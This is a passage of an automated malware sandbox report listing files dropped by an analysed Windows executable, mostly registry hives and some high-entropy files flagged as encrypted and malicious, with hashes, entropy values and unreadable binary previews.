              SSDEEP:192:idVYUrPVEcFdeBKrItQ1SP/w4ThrVlkAl+DSWKnn:ibYqPekys4TXmAUDdKn
              MD5:70388AC49A64FFC061EB19E95D7E0688
              SHA1:748320DC3A99C8F468224346EBE34F303970EB42
              SHA-256:FAE49B78ACF84E0E2D9EB1B9DAC4D62B6765B187128BB8BDC23A47F7CB7AF797
              SHA-512:70F44B7E5F864EF0AF751474D91F74959E4AA9937B14EEF83AAB92FAAF71E0FEE806FBCEDFC01A7E5C3C67151171C2EFA64971BA27EE0511FDD5B57492FE560E
              Malicious:false
              Preview:regf..h....t....s...9....7.O.........'u.6n...<.w|.....+...'..;...r!k..`..4..v+..o..X.?..c.QfF..j."t.t-.i..e.u.f.)?m.v..-..X..v.o.7QC.....,P...|`..?.?.s.i..F...f.k.u..u....s..Y.M...jJ..M.I...H.....4q\........<}3.Tb.G.\Y...r.....A..~<._..F...J.j..-+.t.........)..P3....;#..h...P.hT...C.p...rf.}...C............*...E.."..TO....nm...p.L.3P....Z'VI.F&*...m...H.JG"...?...2!%(......W...C..).(.......'.....b.....I.E8....N[T....+.gu.k..6=.d...f....:.....~.q.....p.b.w...L..#f...\..d.4.^.*... ...R;.@0.1...r..m&K...[..../`.+.C..j....P..[..z^.g....s...|...}3..h......x..jA.kY.*..A..b.%......4xk...|...s..H.5.AZ...{..b..^..}0..1......n....O.P<..."dI............s.%[....1^..J.>=cb...Og.g)..t:...c.Z..@.)`..q...Q..(../-....m.8P.B....".c.....SP..vYr.}.zd....>.......|..fw}...v.VH.qP..w.v.X....Rj,e...Qe4. .`.(....Y.7Q.fhZ.}.N..0.o.Ze.S.lc..E....7......%&..s.e.....5.gl.!.{...$..s..k.zVnj.m....0fM....m&.'..U.,.p6I...-...J.&.o.~vY`..D.:.8.>._.A..m;.,..":.Vw.\.....g..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980668885716245
              Encrypted:false
              SSDEEP:192:MZkN2xnX1FTWvxsAGifgXlm7pi7W4js/Pl3sc5k0jarhz5:Ms2xnX1F6DGfXQ7pi7Jstsc54rZ5
              MD5:26E1B5C441F2292001C362233FF7286A
              SHA1:5B47C4B06418075388A2C680F13A5E7A77689D6F
              SHA-256:F9E9DDCB155A57F3630956EE84A5F210BDED9AB25DA7FBCE1ADE6388C7C88EDE
              SHA-512:2AB2153215C92494FAF7B62A9EC3FC68F6D42072FED6A02E06C5CADA3B6D68E765813D61D5DE3EBBF120864EDFC8B173FE7D20C4AA166AEF30864E6A3BAA544C
              Malicious:false
              Preview:regf.2.N5pc...d..|c.[i.\..3.../_"i.!...ArZ...W..nM...[......<6..<.m...Z..c..L.=V..(......-Z.7......].P..A..s....Y.2..^,.0...K..c..b...v.V.Gd..x6^.5....?&..@.^..I3..1P.~.7...V...,.' Q..s$.........-..S.3...3.yB].P_j...V.ZU;Y...P...K.)~Pn.SP......Ytt..*...8..gq_..d4r.....e.~r.`r.].4..?.....h.......;.>..{....}.V....Y#...W..i...o...uqI.w.kg..!.`w-.;...N..D...).....e,...ND..(P...s.9.GgX...g..%...._.....yZ&=%...$._.....=7...#.....6.....^~........C.....v.^.J..y&.!B....n[....z..$...a/'$y.p..e..@...|.w.?,).>r8V.<.......e.y..D.vS...>..'...H0..k....]o.:;..73$.b..52oz.3.a..........m...-.......}..0r.....Z4!....9[.V.VP{...M...F...x....c=.5.a.P.:.yS...F..\.......w.."N...P.?.=.^.#..Y..Y.....9...+?....sz.?s..{..I>.H'..7.:..r...(+....y.0H.K.O..<k......?.....@."?.K.=....X...e/<...@....4.O.....C\L.x..l"E.(.........)..-B....T#.9..0/...\.L..nr.....* ..^a.u...N....n@.....wQO.?K.upHx...oO e...I.........$.oGT......hY..K.G.C.......3..F...c0...fj..`6...I...J.?.~.x..U*.>
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.98166783863078
              Encrypted:false
              SSDEEP:192:oNUesVVns4KJOw+LVR5EvOCvMwXtFK5H+CpwlNpDLHCjprLTuOe964:D/VVn9KJz+qvxhweMEtLmp7u3j
              MD5:1493C709F967CEB2E0419B2F88DC6412
              SHA1:28FE78F5DB832F0678CF8A192A4302549E988939
              SHA-256:2EFEC25DB988F189C7AC5B3FDF94D4014C8FB0B12EAB885018F93F695DF3C0E1
              SHA-512:9DBBBD08106D2DCE2A31688909FD0815A449EB9D92D6B6E3CD836CA8A80DF6AF87E2DEFBC380945AFB633B2C4D2E54B5AC5E13D30113977C4A74AEA6B785422F
              Malicious:false
              Preview:regf...cn.o......n..?..^\E.Zb.;14.._.......'bL6l.}+..m+R.a...Y9...7c..9+T...m.d..>.....Q.HH.SO.8....k..d.AB.|..K...w3/......6.fs._}w..O.z[X..X...0n.....N.0..'d.../.....X...Y.)..25..2..B3.5I.../(..KZ%u.>....s.v.X!..j..'...E.......%........q............7_.&..4..V.fd.>KO.U..V..W3...v...<.K#.......>/'.H....3..Q.?......Qr.MK6.....tR7....]dz...R4_...?....:....!s...._.4,.#..Nv.......P.Fm....|.Y,.-...R..^..<I.PG.......Zh6.Q\....[.q2...$........1....@.@... ....D.q]..uN..nI...D.5....Qu.9d..Y.).G...p.)K.......#..{.........G.UI..=O...c..XHJ.-._r..84.G......n_R.Q.g.....x.#.....M..>..u.."......e...9..E.p.w]...3...Z..Yb...{...F..6).g.ns...P<.:u$.6..7)q...%c.........8...W.C...S.0\...?..W..^4~..._.Fp....3a...].5).i.).k....D....uV.Y..$i.*...D.2.V ..^.;..~....<..._.0.S.[..}......"..z....:.:.A.P$(.Y...b......1..._..]'i....|9...>......G...DO.D}n..#.:.X.O....d.=Au.:4j.l..'W-......P[.`...6G...s.d.Gm....=.G.6..PP..!.@:..6-..zg{.cke..?..e._.E...{..j.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994393034005228
              Encrypted:true
              SSDEEP:768:irPDzUSW/5ru6AThUvY9RjNClrEMSOOG2HwzLiQNVKR1QwTc:2P0SU9uVT2vkj85EMSO4HS9ic
              MD5:62D946B0439AD7DD01B60643C157365D
              SHA1:79352B22211F213B9233805073211FFF74440EBD
              SHA-256:4D1590B3197B59B1355B88F1039FBDA8879625610AB85065E2014F9ADD91FD7C
              SHA-512:8407042F2F1437D268E1876AC2A30F305CB428F5DF4E98EA35E3C90FF6ADF08ADD2446E55715E4ADDE403C45E3A8E67E8CECD28CC3E2D295D5524FD0BFE27487
              Malicious:true
              Preview:..-....-pI..0c]P.T....7...kt.......0g..QS.B.d.M.....N....x.u...w.c*.I..........L.e.*>..w...W...7q........"...P.......$.+sy..+.{.v.0.....v...t>#..h...4.WF.vn...}...Q..A...G.x.O.rsh..l.Z.2.....K.......|..SCO.e.0.=q$...._.GN....8.....D..D.N.....3uF!.. .....h..H.A.n..H@..HL.,.G......_.x.........J.B.r....p...^^.._...mE..Zy.....AW:.O.4...C.aXp...x.^o....Y.<BN.G.9.A.......~.ey.m .`V{Si8..zp..2-..XTp...M.H.'^.u)..4R...'....v./.s.?..Z.:..k..\..]X%.#....:._4......:l!.q.<...J.h.bI..)+..9.Gd..c.q..S.WvQ.2[...}9_.).(k..b }j .Al...-...{..L....X.,$..B.#........*X...N..T{.e..,~.S[..:3."..................._(.....Y.....l.,.B.|-...~..&.w.xx..%T.....q...R.Y....Dp......$.e.f.I..V....m..0n.*".\.5..C.N]..*...w.3y^.3.K...9..+..w.)...<V.R.T..(34....$+_.....<.a...~#8..;..d.......!I.j.9.........&q]...+S..|f..u...Y.R0S.>...y.q.V.b}.Q..ZR.s;mxR.br.w..<..7wP........?/e.......c.. ...P...7.,E.<.:Sv.^.. ..Hr#1b..6.C.J..".k.ic..!.C....h|..qj.(S.\..p.....j.F.....X...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:SQLite Write-Ahead Log, version 7819665
              Category:dropped
              Size (bytes):1347606
              Entropy (8bit):1.9808970541783617
              Encrypted:false
              SSDEEP:3072:bbP9uVLC94s4V5WbeDfzWsk+OaAl7p90gv4IOPH+HZYzlwOuY5h+olR9FEeI0mGk:bbPj94F30kAl0gyyYJb7+
              MD5:1864141B186E0A47ECA93884368F8FF5
              SHA1:96D1673FB4AAE3D98034B52D35FC73D80B9BDE9D
              SHA-256:91F21B7AC0CB64AA44D5D101849CAF4CC115E8A49F8D7916CF2EEE22C7A112C5
              SHA-512:884DBA3B8AFA4FEFCEF5E6A2D491703E6A8E627815AC7487C3F8A9109F8B9586F0F9A914A7BD987ED338AF1BA19A04914B8FFD534CEE0D0CEE373D7C2058280A
              Malicious:false
              Preview:7....wQ..;...b..B....Fl.w...{..jQ..3..b...K..:`.0Q....km.....f).Z.{.d....$..&....JdO.8h.qg.o/ZK.J?@..W...#P.7.\opy...4.0s(...7...Z."b....0.....@0.d...q..6i..k.....5..C...C"9L..fj...=b..+..........z..g./..p..Q.F......D..v.'......Q.p..u.?..N.....c.c8.. c...Y9.....0/..w..$!..@.yk.M...l+06....<.~:...~.5.R.z.I......n....Xd..Yk7.c...2.....`]1N.{..p..[.aa....+..U4.....y..E..f...,).<A....M....K.6..C.;. 4..P4^....-=c..?..Z.....MGaj...H^a..s.-.aMo...R9}V.{SX0......;J........].y...G...vSF...\j.4.i7.....+..Fj7........Q...I..Z..G~..Z...?5...O.|..+....9WL..LD-....4...].|....p..B]...3..Bw-Y......;..3.l...3..*.u...:p.U....M.#......k-......+....L...u..E.[;g$.P..#O..S.rZ.[c....|+........y...I.&.-.....q.h-6...>. J ....(..$..L......'.lX..#.e$E'.%.2J.Qf...q....X.<."......>.c..Ce4......._..~X.R,.+c..._..9...h.S7.l5...8....T.6d.....4..-.2..4]z.C$.a.1~.....l.....lK.&...-.....jm .......6.v..KT..0*:.k..".9.T.RT...0..@O..m6..m..3.z..._.1.q.Z...O.=r..../.|.n....b....$.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4430
              Entropy (8bit):7.954206931146919
              Encrypted:false
              SSDEEP:96:iBIJixtOo/3MZepSzsq5R890Ni36C1z+YHy4yEU/t/VoHKr8m03LC1Aw+lp67bcE:itxtJffS4qI9h6C1yI4V/UKR0baD+bSV
              MD5:7DAE9486240384C5D27D24408C9E034D
              SHA1:7AD43AEED841B3D510E18CB2974798BCCD29406E
              SHA-256:489FD12185C8B9B827BC28A0595DAC9541AE2EA5E2EC872517DD9706F75751B4
              SHA-512:2EADB2DA61AA607571B0CE27FA8741176383BAE9A7826B65C12AF86D3F8EFD534CEF88725BBC5C6FC96FC5D4FBF2F455C67D0C38DEC68F29504CB3BFBCED4FCD
              Malicious:false
              Preview:SQLit...6.p.....F.i%..w.x{Jg..0.......W....@...'......s.L...r...........WMhvo..ODz9.m...u.....sJ.+).......%......M.@....W.I.4.F.V.*.6`....V{.....[g.c..../B....`..hOn.....z..=.kd...../.'.,...+..2{...PV.U...R.mZ}......5qf?%..:V.....\h.y1..QA#.].......H PL..?.&(.g..T....-[nH...i;..1....E.7b.6W.......>.T.=.c>qK...|kq.qV.c9...x..I.F.>u..-..y..F.....#...7.GB..$3#a.l.]}..........?.Ef...J..w...:C..~.T......=....T....$..9N$m._QgCJW..@.............D+.n...Ps.9Y.'VV..9..5...7.....2.....Q....#{..x.zF(Z<%.AK.h0.|.1.....G&.z..V...S....E...eh.......p.'..b....*...s....K<r.0b..#?xy......+L5.p...7.r..A.>`......5,..q.f.e..Gm....u...a.e.....o......3|.s.!..n....}.e.RF{.{.}......\".S[."L.. ...q.).s6..e...M..k.....0T5)........u..r.E.{~.....q......E]...,...&<..-S0.m..s`.~.1}. pR....y..V..........@&....OO3.u.......h.K........K.fx-.R.T..hYG.:.. .s...\..Bp...,.'*M|.u.....w.cX2...,..iD}...M.#-...:tw%/+......A.g........49...#.a&......8....SZ6pj.u3'
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):65870
              Entropy (8bit):7.997579285634312
              Encrypted:true
              SSDEEP:1536:K6Sxa7Dg+FdXMKS9oiPx++dX4xVyKMyFb4gnS17vN531gumLr7cjMW:P7Dg+cHPx94xAyFsgS1zN531PAPW
              MD5:D1E3E3B2EF1CFBB8B8D800EBE089566D
              SHA1:2F30BF09E67A06074FC303FBACBF9E8D8ADDA86B
              SHA-256:918863610D515F938A9D3BC9BFFFA2BAE95C5C211B45384922E09D0308276E8B
              SHA-512:10112C3CDE20E2F33C5E4743A54EEAFC3968B024E081E60CFC9A5497E8CC7025A3CC30AC8C0248AE244AF516F291E28EF83B4D00A0F5C63310786B03B2133438
              Malicious:true
              Preview:.......o1&.......o.:.......'^...z.Q....9Kl.....oX...r..hL.7.F..._....$..o.[>..R..7......Y.M..1Crf..&.QE.kh...X69..U..p..?p.n.C...?....9Q...a.u..BK......B.Prl.....+SC:.?....K}&.y.........c..U!.s. ....2E.......v.7....C~...6.lvt....Ss`Q.].M..&.^.w.iA.t\...M...w._..._&.^..%...TR.t.[..T..,r..X..(.FQ}...Rp=.5..'...&@A3....(.H.yi..B...n..4.vy.v..Q...S.+..$..*......8\....^d.8.{.q.......}N.EFi.nIZs.)..CrY..../.k..q.......z.Bc.9.5/.......\.q.w`|...o.i2....8...g.&D1....K..j....f4....[.e.....`.,..Q...wg.<.b.a.G_.F..f..>;...q..H..+.$.&...g...D..1....m-.H.....\k..A........ .n.J.....1...ev6...@?.....B...i...p..;1x........D.u.}.;.........Q.Fo....a..;...5pg.{.H.w.m..~...H.......`.5.4..B.8...4S.'.b......1[.[W.L^UI._[.d.n..|ta".Ts8..+...../N....R.p..'c/*=p.5.......Q..@....D...C.....-.,.....U...;AIfU.P.sX,VB..r....7..m.7..P..d..s..~]...H..)..7I^2.\...(..|&...g ..IJs.Y...zv.[u..\O........"t.....\2r...#.6...."...$..H..Mk.@.e..%C.F...9.N.......=e..N...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976804894913764
              Encrypted:false
              SSDEEP:192:Bh+JP5xMG0qddEAcacZ87PeAkCAu3AdfZH8zzypILrP1:mJP5CWEAty87P3kCAu3AdRpaLj1
              MD5:5EDD64FCD7024BA1D9DCCFCEFCDA4D67
              SHA1:0171340D46041688CAB3CC3A36B1087F591FC107
              SHA-256:7EAEC52E2F11AED3719AE2B940975C57761A41F2EDBFF62C51B1504ED54EC52B
              SHA-512:B72A284300E06672FE903B2A8F8FA4E050412C7729CD25994D3E51EBB99CF7B637D99671CF46DDF4571BFFECD20ED46279647EE7E89AB9C07295503219530108
              Malicious:false
              Preview:regf....i...@3u:&...U..F2...p.....(.DMJ6.w .$o,...`...k....r.......y)....f.J...e.B......iD...V..{.b..H..*>..A@u.Y....v.......x5.?H.#....P.*.........X....S=.._6S...."..h y., .....c.b.`.9n.:.V....j.R.}@..$..r9wt...x.....[..R....6n.D.u..G?...h...H..'aB.r..Ux.e....+.vf.m....p.."..&._!!x...L.>.9K..r.'1.w...%...P..S..!.5.m}...z....J...F.d!W..z~...h..,.>Hdl.F.j3.\../].!.b....P.7....{..N^.l..D..=.Z..YE.f..$@...2ng.Bm..h,.z[..0]..f...\>.T.6d.....ug .&.y.b......S!<]..$B.GR./....%-..6..?..B..8.).......L.U4...8F.c.'V....75.P..co.U.n.a..W.]n.X.z....i..S....'...V..(~...~."..\~".=.p-J&;..SA..f.i.q....dN.1.._...z:&...Gy}.m..-.=J.7e...$...N...w....n."...`...(/M..Z..'....4&..v@...G...`.....>&;.$.....;.m...Q...Q$.........ml.j.-...J`..~".....XE..:.....1..Q>...8h....I;C...M<.Q1Ake...Vb..o.S..IA... ..]..K.....$.2.k.*..4r......d]....(....y..!.a....M ....q.4/....P....X..EL_".W..|...;.C.U@......{t/...F8dZ.9.g(..!..E....}..:z.%..j...%...$...2......{W8+F.aS
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981005478153391
              Encrypted:false
              SSDEEP:192:TOnMm2yAMDWtj0NA/7hPVCqODjj4Sm+q/X6DRgGh1U0nCG:TGj2+9mdVCnj4SmN/6DaGh1UYb
              MD5:E49B46FF9632359358AF4D9B047BE999
              SHA1:68383CD4F27402471D6CE79761DCAA07391ACBD7
              SHA-256:1B3FD034547A64D5799AB4BD3AC2A8D5442117A9050D801561CFF4BF9AC8B339
              SHA-512:D9E829A20FD04220B9425D8565C0D14FECC266E96F134F307390764B05E4E3801ABEF43AEAB6FB1AA6652E8B27B01D767DC051806EEC0E709FB1A38075398D43
              Malicious:false
              Preview:regf....0o.....W........7v.]..t....|....<..p. &..."..b6.".C.g.x....L.F..6xw.A..V.^..8.0..z...r..R...|L..|.B....6..N.).`...m,...-....../.=....}....7......*.....f...pvH.+...-w../..T.2..);.PnZ2...C.y.pd9..'..q.Azz..z..l. 8_.IY.R..F...ye..3.X..*&....*....E...Gl&z........l,.:..).0.X......Sb.v.!....9..5.&..v8....D..l*.M..Fz.e..dkE.-.%..../.Rc..!.P...P_...OH?...Cs..k.]K.R.q...L... ...C`7...U.~.G...#.mXM....F$2^Z.....'.!..:..7...#....`....+...2].....K.N....wG]....-..Gq.<.!i....(....,l....0.Bw.r.=.......p...N..W.I.3....K..`{u..^.m.`7...)~.;..8..o.4..L...8.>O.x.HE...'..:.W..=..4....$......57.7...T........6..?.;...N>..4MX3.`...=Q&".&u..S............<..ARG..&W..#...08.r......gb..JG.^l.(-..I..|.....S9..P.....P...VU.(@...5].:n..y....D.`!.H.-f......T..s.*...WfUm=0.................ste}o8ac.........L...{K..8(..|.]p.6U_z....E..../z.V.(...F.Z........Ml.z=.g.....r..s..............d.......x.2.3u.z.;V...u..>.W.L.."...T..;.6.5er.<..Q.U.h'[.5tB...`j....d.S4.ZH..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981215358358529
              Encrypted:false
              SSDEEP:192:WXn7Tme4timxV6cI9twykcoSqfzcP7mTssXuHqjuWQcB:WXzSvxU7ZKrC7gseuKjnB
              MD5:0A8BC9BB3448EA1DE5CEFDEBA82D6C9B
              SHA1:C84B80F7ED1BB728F4E6E86D6DE7DAC349F2A462
              SHA-256:5ED858D88752749B54484F4F01811FE4CEF6CB48DDAFADE02E274397F9BF8FC1
              SHA-512:EA960E3B31D2C26651D55E24EA7A49DAC728A4ECD3D01BE33CEDDB7ABAD599CA3972894596054EF228DF5F81BE84A4FADBB57067D2F051C883FB77731C589C45
              Malicious:false
              Preview:regf.9.....k@.b ^~[B.e........2`.."....@[.....RP..{..k7...P..._.[.7F.v.NPRD.A z..9z..Aj.....E..k.d.....%.z..........U|......s....o..EF$.H|.Zz...~.S....X....%.O.A_..?..q.../.b...Of.....e..........v.t(?!;.eq...O.h.u.r..{RIx,.......+.m.~.H.....]....!.Bg.p6!..U.l..a}#w.B...6"...X.t.|k.f1[.!6.`.]}.*WL.5.}.+?0BS.Yb.g.w......H~Mp...KO...}^....b~l.y]7G...%$...eY.....GNLs...[.V.ER....=..YkY*.i.$.....o.RRq."M...+.iCO,...W.?.~JU......d.pyd?...f...b>/......}.H...ts.&_Y.Z..I....K..!T%tlU...EE%x.=,2../7H.\.t#F.vck".0..d*.#x8y.....0.P....{.M..uV.0.o..,[.XC.......:.T..i.......jz.H.)&(..+>.U|....H.....[,^....F.q}.F...e.)s F.se.....$}..._'..G....4h.%.c.9.x...Q.&.....8.<t..W.........^...&.......:.Ywh.Z.+...1w:..f.bIu]...Z.%px.N+j6........+.aW..r....!m.........s..K.J.C*.....Z.j..@.....'..q.P.d.a......3.N."7......\.u-..)z.s...;\..s3.p.r.!<./.\..\.I..B.2...dd...~..j0i..$.&#P8....K...m[...0.:...F.te..N...eB.@o...I4..8....:...}..`X.!`...E..N.z(.d.'....D9..>......f.Z.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):39476
              Entropy (8bit):7.9952671325117945
              Encrypted:true
              SSDEEP:768:L6zqM7mldLmNQX9a+eHh4TEXmbxxU9ni/oa/qQKCTjk/O+AEQLhwwB2WJ0LCYX23:LjMqlHYgEUilivmqjk/4DLl0vCgG
              MD5:17BE69DB73D9C020E49364152D17882A
              SHA1:89292DF00426BF511D80AE168838559FA8317659
              SHA-256:569BBCB398E13123F128EA4C6468BD276AF95CD7D8907C6E303EC093C987E733
              SHA-512:584A2070C623A7454F3A0ACBDDF69E92192E850E8160CB4992041449B6F7EF75DE3C14EF8ADA542DC7F47D8C14002BD3A008C221ABFCBED30F22DB0314977302
              Malicious:true
              Preview:..].N. V]U...|Vm..ki.]..x...).?....q...l6.X.^I..E.Yd......5.m.C...3.d3.)..v.....o..p...\.......&V.~...I..n..4.,@}.g..y.=....c.C;.........dj........@.....V.1....\...c..(.z...J Z=.E....z.P.t6.e..VF...^.D..b._...(V...3.Y.ot-7.h].`...L/.wk.(wZS.?.m.6.K..../e.j.K....x..wsb3..Z.lW.~n.6W.`...Z.....6.....qp..>.N........VVN.2.<ND..B..J~....H..\#..m%S.....{l"..N...f...S5.q.eC.}....q..P(.c.%zg..-..C{Zf?...eF.X.>.....h.bj.@..V..$#.m..Q.L..<..d673i.).^..V.......#..4..'.e`>.Ke..._7BV.Yk.O..:...E'B.......|+.Y..........).?e^..o.. .dn3.,Z....8`..i...^@>....#.&.Z.u.q..+<..,`..!.(...aeulh........++....SBJ..7cr.(_7=...../k...)0f.{C.RB9.../f....1l..ZJk,.E.z.8.S2...8...r.E.]s..<..)...N.S...2..C./.:J74..h..5...&. Y..=.... Rp=..~.c.......[F'0K..>.V...U8.q....&F....]6....7.........,.....Q...<..K....Q..gl...E...L[..A......?.5'D4xVE5r_.)...7o.....#...s..5.UB.6..=>\r%....v^...*..6s+.W9.......".8.h.....*.CR..*JhA0C..uF5*.....u.."t.c.D.G|&.......Pj..p.!.0..@.}.WH
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976872478054536
              Encrypted:false
              SSDEEP:192:ZKZqmsggshE04EWDBlXIBZ8ufJXWa1pDp3:ZKgfG4EWVlYzHJWE3
              MD5:B9C0D48BDAE1A2EA7347EB87729F4961
              SHA1:1E93F8616C68C0010D8F45D9ED9850A18DF0B385
              SHA-256:CAAD53052A6D6885EB42015EEE47A13B4E288882ABB117415B3998687283AEF9
              SHA-512:C228C3581CFC9B9891FC6D616E071398D7214CE3B2F8119AA16A19E20840C560412548293D1863BB6016E040316E6110A0723A15896D62534E79F35D30F0A4F2
              Malicious:false
              Preview:regf.A.V.J~G*..{.......9(......CA.V..Z...=.....h.0../.!..r..i..s..-........e..r.f......I+d....{..."..H....2..bq.....`H^....m....|gT...X.. c..i+..3u.Z|X...*...C..+,....NGt.2=.....~..s..1E......G..CH..xK8......mny.E..P./x](+....=!_;.U.j...>.n.-._...........lG.......N...#.i9:f...<.\...Q.)...U="s.[..(..(...aK..xT.../<._Fe.6!qD......a.y....6..O?j.7C....B....c.}.....5.DE....vs...3[..&C>..O?.Qs....../<V.]...(....b#-...#zQb.,S5Jb..%....wm.."2......>.s..B...w&..lFM.SK.o.R.......=.X.av"(...q...*.8Q.}.W.$.y_u.D]....q.....!.T..h..Y*<."..r4.....}O..A..*m..Z..../...5.N.gd|.;.^5Dc#E..1M.....o!M_w...a-...s.GZj...'*z.=H..s.K.YO.9......F.r ..Wj.....9..A.;}.s..a.......KI.....0.=..SwM}.8x...5..h.B...1|1..^..An.I.~....&....WW.ur.9..=h..'..D.a...5...}.......6...>...).CX.\.6..'..*.F...S.vh[p....(.o......w.....78.7`.$...q.....a...\$......-..lL....9..~mp_...;..R....%.6....j.Wi<....#......"...L...=...S..9.7yH.kl.X..O....Q.l.x....y..N{I.....T..........I.)|.\.A.H.<9O..=..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977776028108428
              Encrypted:false
              SSDEEP:192:M6c9o27Tsr8rJDkGkf6sloL6voHMomYyiwvweH/bb/obTF8MOy0A:M6c957Q4DkzoL6voso0iXO/bbqT/D0A
              MD5:357EEF42E25DE0FE0B28255957C7B92A
              SHA1:5C3711C33EF7B6F08987EA394D7B9861AF7DEFA8
              SHA-256:BC1339A878E7514AF42ED67E461745BAD7CF6BCBEB51393CE100952DDB4AEB87
              SHA-512:13788EC150534A3A8535C977F65F6281B8C84F6877A20F2B290FD776CE806E1B631D41C17A941CA56D3389567E684473E7AB3550E2FA2DABED9C6022E2C2D7CC
              Malicious:false
              Preview:regf.........!."s..(9k......a.o..+.... O.B.m.2.MLB...o.[..K.6.{..)$GZ..7s.m.....xz...]wv.!.c.O.Q..8.~.AE.l...c<..2..v...-={.u.O..B.W.dc....((;B..0,.c-.....w^..5=;....^ga....p.M.vP..U...d..G..0...A8R:1......w.I.!(..#:0a.2..9...$...`.=93su.nFEI...g.1;.ZxI.8..*..!>.G;~..*..b_a..w.a...y..c.!.....[m.E.]$...1......m.O.....[./."|..G..)..].V.A..f.....)<..qRL^......j..5.b:5.W..P[...c...Y...@..*O...ZVj..s.h...f..V...SB..QT,m...,f.t,m......N....EhW.p.....C.........WS..1.....1.......(".@.....;.`...{../.._...$....j<..?G..$9......Z.pG.....Vgn.q.;/9..u.....wtO..E./...b...........!1#C9.....O#...=.f7?_P.4..%...c.#..#U...d.)\.....+..3.....>V...}.%...}.&.#..E....#....)....e.....2.t5..4...~$.W..:.....&.\.K..C...F.vC.......*...&.......g.....Y.3l.V....^.....I.J.&i.....E.7..t..$.l.C.2.*j=T...G..F......#......]...R.~.o.4.3B,h...H..%.G..z=...F....>.....{.G........[.........Y>m.. .*.1..FL6..L...~..m..j.&.ya.w5.RL......Aph....6..j..o...b..)T.?..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977411516258226
              Encrypted:false
              SSDEEP:192:gjQyVJRpVTpCjfe+NVDDZgwxxalYLznhaNuK+8Fe9q0QO0H:gEyVJRPgjxNpVgKO5P7H
              MD5:8514F3766330CE4F3CB96FC3389D2891
              SHA1:1225F98CF731C728AEB70403C1C26DE057E10448
              SHA-256:6607E712F9FAC2FE0ABB50E766DB282CAEA94F20D97B0E5F246F5285F9C4E801
              SHA-512:8E976F879327B2A93ABA36C36086625D2FE98D5EEFA0B87FBE8C12AE378287B55B060296885B51F647771DFFE412BEC925B0E6CAB55D40BA236BC93B84FD5A17
              Malicious:false
              Preview:regf...JC..:....:.3m....Xr...j..-....2...v^....os.E?..eR7R..$....jq..6.$r..X.b&...~J6u.3.....~B'8g/.ep0.g.9..,..m.(.bIlK<.\b.$...#..WF`Z..d.'.L..9F...G....It.|..iu-....L0..l..Q.A..v}...;.#8...'.....r|..m..j...5..3......^.......2.7O.........<.(._.b.........2...X#...o....5;PW:V...$I.M....f...L.O..L..{m.U.o..N.5..aEM..1.Xn.~A[..........uI(9.X.Z......c..L.o.-..I|..&W.w....=..AZ..y...9....G.....-....~B..m.........F..s(.....gjd\......d@...|..?-..5...TR....)....M.qO;K.(b.dY.$n.#....."^........S.e.(.yi!..}....&:.."../...9_m..Ky.0<...h..l.6P\..(..j..U<.Hb.7.b.EL...Q...zB.3..&E....2R....Ah6.kz.....r...rG.+.:..V.8....!H]5G.>.e..UM....M..v...l.}...p..j.....8+nM1...>.......L.Y...^.$cT......f.^..M.Z..?...0Dm=..9.OLt...>.p,..L.w..q^.47'9%\.<....D...x.DV..\...6=.$. .q.%A.h%...{?..#y..N..c9.zw........+MzG....s&......<...w.a_....N.)Px.!3.NB9..CO.2rFH....Q.g.w....v@.y.d>${...FJ.F((..).c3Yn..4"-5......@. p.T....l..t..J...,5v$..*&..r../......JPt..^.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994839945599123
              Encrypted:true
              SSDEEP:768:nQ0fw5WyvJeTMLUOAl/arMSGj53d2Iz5LckSUHO:na5VvJeTMsNaxW315LckS1
              MD5:CD31A0433BC366CDD571692B705C0972
              SHA1:5ED6184BF7E7F1BA5805E30BB5FDE785283B7FF7
              SHA-256:F5CD3FEBD1C55C56A34F4D58A9AAF3EA21AA588FDC65638FA76CCC0D1E0809F5
              SHA-512:7EC86D321863EF862C1954EEFF0DD2F004AABFCD960954C6EB5689A47B27C3D13A3962DB12309B2EEB31595267795470ED8954E07EE793B0FF74C2C1062C0D6D
              Malicious:true
